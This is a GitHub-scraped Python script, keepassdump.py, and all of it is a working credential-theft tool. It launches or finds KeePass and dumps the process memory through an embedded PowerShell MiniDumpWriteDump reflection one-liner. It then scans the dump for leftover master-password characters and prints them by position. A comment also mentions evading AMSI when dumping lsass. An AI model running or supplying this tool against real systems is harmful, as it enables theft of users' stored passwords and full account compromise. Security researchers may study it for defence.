-
Notifications
You must be signed in to change notification settings - Fork 0
/
keepassdump.py
116 lines (88 loc) · 2.85 KB
/
keepassdump.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
import subprocess
from subprocess import check_output
import psutil
import re
import time
def dumper(process='keepass', file='kpd.tmp'):
# mem dump of process at %temp%\file
# AMSI will catch if you try to dump lsass
c = '''$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting');$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic');$Flags = [Reflection.BindingFlags] 'NonPublic, Static';$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags);$p=$env:TEMP;$ProcessDumpPath = $p+'\{}';$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create);$p=Get-Process {};$Result = $MiniDumpWriteDump.Invoke($null, @($p.Handle,$p.Id,$FileStream.SafeFileHandle,[UInt32] 2,[IntPtr]::Zero,[IntPtr]::Zero,[IntPtr]::Zero));$FileStream.Close()'''.format(
file, process
)
cmd = "powershell -c " + c
returned_value = subprocess.call(cmd, shell=False)
out = subprocess.run(["cmd", "/c", "echo", "%TEMP%"], stdout=subprocess.PIPE)
path = str(out.stdout.decode('utf-8').strip())
filepath = path + '\\' + file
return filepath
def open_proc(proc='KeePass.exe'):
if proc in (p.name() for p in psutil.process_iter()) :
return 1
else :
paths = ['C:\\Program Files\\KeePass Password Safe 2', 'C:\\Program Files (x86)\\KeePass Password Safe 2']
for p in paths:
cmd = f"""cmd /c start /D "{p}" {proc}"""
r = subprocess.call(cmd, shell=False)
if r == 0:
return 2
return 3
def get_passwords(file):
print("finding passwords...")
with open(file, "rb") as f:
contents = f.read()
length = len(contents)
passChar = "*"
current_len = 0
debugStr = ""
pass_char = {}
pass_char[1] = ["*"]
for i in range(0, length) :
if i == length-1:
break
b = contents[i]
b2 = contents[i+1]
if (b == 207) and (b2 == 37):
i+=1
current_len += 1
debugStr += passChar;
else:
if current_len == 0:
continue
else :
try :
c = contents[i+1:i+2].decode('utf-8')
x = re.search("^[\x20-\x7E]+$", c)
if x :
current_len +=1
if current_len not in pass_char.keys():
pass_char[current_len] = []
if c not in pass_char[current_len] :
pass_char[current_len].append(c)
#print(debugStr+c)
else :
current_len = 0
debugStr = ""
continue
except:
continue
current_len = 0
debugStr = ""
print("Password Position and Char")
for k in pass_char.keys() :
print(f"{k} : {pass_char[k]}")
def main() :
r = open_proc()
if r ==1 :
print("Process is running")
fp = dumper()
elif r == 2:
print("Process is spawned, waiting for 10s")
time.sleep(10)
fp = dumper()
else:
exit
print(f"Process memomry dumped: {fp}")
print(fp)
get_passwords(fp)
if __name__ == "__main__":
main()